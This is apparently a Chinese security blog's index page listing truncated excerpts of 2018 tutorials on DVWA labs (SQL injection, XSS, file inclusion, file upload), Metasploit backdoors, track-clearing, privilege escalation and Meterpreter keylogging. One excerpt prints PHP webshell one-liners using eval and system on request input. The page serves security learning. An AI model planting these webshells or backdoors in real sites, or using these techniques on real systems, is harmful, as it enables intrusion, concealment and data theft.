自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 资源 (3)
  • 收藏
  • 关注

原创 DVWA ---SQL Injection

手工注入的一般步骤: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据dvwa中的代码分析Low<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) {...

2018-11-28 11:04:44 278

原创 DVWA---暴力破解

暴力破解(Brute Force)的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。理论上,只要字典足够大,破解总是会成功的。阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,因为你在A网站的用户名、密码通常和B网站的...

2018-11-27 22:04:07 1341

原创 DVWA--文件包含

PHP中存在文件包含漏洞的前提,在php.ini中allow_url_fopen=on、allow_url_include=on才行,不过一般allow_url_fopen都默认设置的是on。LOW能看到配置参数的变化:如果我们改一个不存在的文件http://localhost/DVWA/vulnerabilities/fi/index.php?page=new.php...

2018-11-23 17:28:14 1044

原创 文件包含漏洞的原理

文件包含开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。文件包含漏洞开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多。文件包含分类1.本地...

2018-11-23 09:09:22 1259

原创 metasploit---创建后门

后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。常见EXE后门metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...

2018-11-22 20:07:12 794

原创 metasploit---msfvenom

在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。1. –p (- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...

2018-11-21 22:52:13 1531

原创 metasploit---后漏洞利用--清除痕迹

对于黑客来说,一个重要的事情就是如何隐藏他的行为。在提取之后,后漏洞利用的下一个阶段,也就是借助日志删除清除痕迹,以及禁用防火墙和防病毒系统的警告。防火墙分为三种类型。包过滤防火墙(Packet Filter Firewall):这种类型的防火墙工作在OSI参考模型的前三层,并借助了传输层的一些功能,即识别源端口和目标端口。当一个数据包流经包过滤防火墙时,防火墙会根据配置规则进行匹配分析。如...

2018-11-21 19:47:50 2314

原创 DVWA---文件上传

File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。网页能够上传文件的条件表单提交方式:post (get方式提交有大小限制,post没有)表单的enctype属性:必须设置为multipart/form-data表单必须有文件上传项:fi...

2018-11-20 19:54:42 421

原创 webshell一句话

PHP一句话<?php eval($_POST1);?> <?php if(isset($_POST['c'])){eval($_POST['c']);}?> <?php system($_REQUEST1);?> <?php ($_=@$_GET1).@$_($_POST1)?> <?php

2018-11-19 20:07:58 2277

原创 DVWA---XSS (存储型)

服务端代码 LOWtrim(string,charlist)函数移除字符串两侧的空白字符或其他预定义字符。charlist可选。规定从字符串中删除那些字符。如果被省略,则移除以下所有字符: "\0" - NULL "\t" - 制表符 "\n" - 换行 "\x0B" - 垂直制表符 "\r" - 回车 " " - 空格stripsl

2018-11-17 20:09:37 1256

原创 metasploit---后漏洞利用-提权

提权就是提升对资源的访问权限,正常情况下,这些资源是否保护的,拒绝普通或为授权用户访问。通过提升权限,恶意用户可以执行为授权的行为,可以对计算机或者整个网络造成危害。提权广义上分为两种形式垂直提权:在这种权限提升方式中,低权限的用户或应用程序能够访问那些只针对授权用户或管理员用户才能使用的功能。这种特征也称作权限升级。水平提权:这种提权通常指的是用户权限在水平方向的扩展,也就是,普通用户能访...

2018-11-17 17:11:29 1774

原创 metasploit---后漏洞利用

后漏洞利用的几个阶段:了解被攻击对象提权清除痕迹以及隐藏收集系统信息和数据安装后门和rootkit通过跳板渗透入内部网络尽可能多收集信息系统的详细信息查看被攻击系统的IP查看meterpreter附加到的进程信息查看被攻击系统的进程信息检查被攻击系统是否运行在虚拟机上检查被攻击对象是否正在运行中,将会显示最近一次运行的时间检查被攻击系统的环境查看被攻...

2018-11-17 14:32:01 717

原创 Meterpreter基础

我们对被攻击目标主机实施漏洞攻击并从中获取到一个meterpreter会话后,我们将使用该meterpreter会话来充分使用metasploit框架的各种功能。进程列表getuid 获取系统ID以及计算机名称kill 中止进程ps 列举正在运行中的进程getpid 获取当前进程标识符键盘记录keyscan_start 开启按键记录会话keyscan_stop 终止...

2018-11-16 10:57:07 522

原创 DVWA之XSS(反射型)

反射型XSS服务器代码 LOWarray_key_exists(key,array)函数检查某个数组中是否存在指定的键名,如果键名存在则返回 true,如果键名不存在则返回 false。可以看出代码只是判断name是否存在是否为空,并没有任何的过滤。漏洞利用url:http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=&...

2018-11-12 21:15:44 803

原创 TCP四次挥手

四次挥手1.客户端进程发出连接释放报文,并且停止发送数据。释放数据报文首部,FIN=1,其序列号为seq=u(等于前面已经传送过来的数据的最后一个字节的序号加1),此时,客户端进入FIN-WAIT-1(终止等待1)状态。 TCP规定,FIN报文段即使不携带数据,也要消耗一个序号。2.服务器收到连接释放报文,发出确认报文,ACK=1,ack=u+1,并且带上自己的序列号seq=v,此时,服务端就...

2018-11-12 19:29:40 341

原创 SQL中的全局变量

@@CONNECTIONS 返回 SQL Server 自上次启动以来尝试的连接数。@@CPU_BUSY 返回 SQL Server 自上次启动后的工作时间。@@CURSOR_ROWS 返回连接上打开的上一个游标中的当前限定行的数目,确定当其被调用时检索了游标符合条件的行数。@@DATEFIRST 针对会话返回 SET DATEFIRST 的当前值,SET DATEFIRST 表示指定的每周...

2018-11-11 22:17:44 1409

原创 metasploit---渗透攻击基础

打开msfconsoleroot@kali:~# msfconsole当你想要查找某个特定的渗透攻击、辅助或攻击载荷模块时,使用search命令msf > search ms08-067找到攻击模块后,可以使用use命令加载模块msf > use exploit/windows/smb/ms08_067_netapi 当已经进入某个模块后,使用show optio...

2018-11-11 10:15:42 917

原创 metasploit--- 客户端漏洞利用

    客户端攻击:首先需要我们对客户端-服务器架构有一个清晰的概念,同时要区分客户端和服务端攻击的不同。服务器是在网络上共享其资源的主机,而客户端则是使用这些资源。客户端攻击仅限于客户端,且攻击目标是运行在这个特定的客户端主机上的有漏洞服务和程序。针对客户端可以发动很多攻击,比如,基于浏览器的攻击以及针对有漏洞服务的漏洞攻击。另外,客户端个操作系统上也会运行一些应用软件,如...

2018-11-08 23:06:59 967

原创 metasploit中使用nmap

msf > nmap普通扫描nmap 192.168.1.1扫描整个列表msf > nmap -iL /root/ip.txtnmap探测选项-PN: 不发送Ping包-sP: 执行仅用于扫描Ping-PS: TCP SYN Ping-PA: TCP ACK Ping-PU: UDP Ping-PY: SCTP INIT Ping-PE: I...

2018-11-07 22:12:25 2801

原创 wireshark显示过滤器使用技巧

在使用wireshark的过程中,因为要在大量的包中找到自已要的包,所有显示过滤器的使用时必不可少的。在使用中,个人总结一些小技巧。显示过滤器使用的常用语法:协议 . 字段 == 值 (或者某个范围)1. 要过滤出在frame协议中frame number字段中小于60的包,如下语法: frame.number < 602.如要找出udp协议中源端口小于1000的。语...

2018-11-07 18:02:21 4320

原创 TCP三次握手

三次握手第一次握手:主机A发送位码为syn=1,随机产生seq number=x的数据包到服务器,客户端进入SYN_SEND状态,等待服务器的确认;主机B由SYN=1知道,A要求建立联机;第二次握手:主机B收到请求后要确认联机信息,向A发送ack number(主机A的seq+1),syn=1,ack=1,随机产生seq=y的包,此时服务器进入SYN_RECV状态;第三次握手:主机A收到后检...

2018-11-07 11:12:50 757

原创 metasploit---信息收集

域名信息收集msf > whois 域名用辅助模块收集邮件msf > use auxiliary/gather/search_email_collectormsf auxiliary(gather/search_email_collector) > show optionsModule options (auxiliary/gather/search_email_...

2018-11-01 15:29:07 485

原创 metasploit连接postgresql数据库

打开postgresql服务root@wu:~# service postgresql start进入postgresqlroot@wu:~# sudo -u postgres psql信息查看postgres=# \du 角色列表 角色名称 | 属性 ...

2018-11-01 11:16:36 988

VC9的32位、64位运行库

32位的VC9运行库 64位的VC9运行库 64位系统除了要装64位的运行库也要装32位的运行库

2019-07-11

CentOS6安装honeyd.rar

arpd-0.2.tar.gz glibc-2.14.tar.gz honeyd-1.5c.tar.gz libdnet-1.7.tar.gz libevent-1.4.14b-stable.tar.gz libpcap-1.1.1.tar.gz zlib-1.2.8.tar.gz

2019-06-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除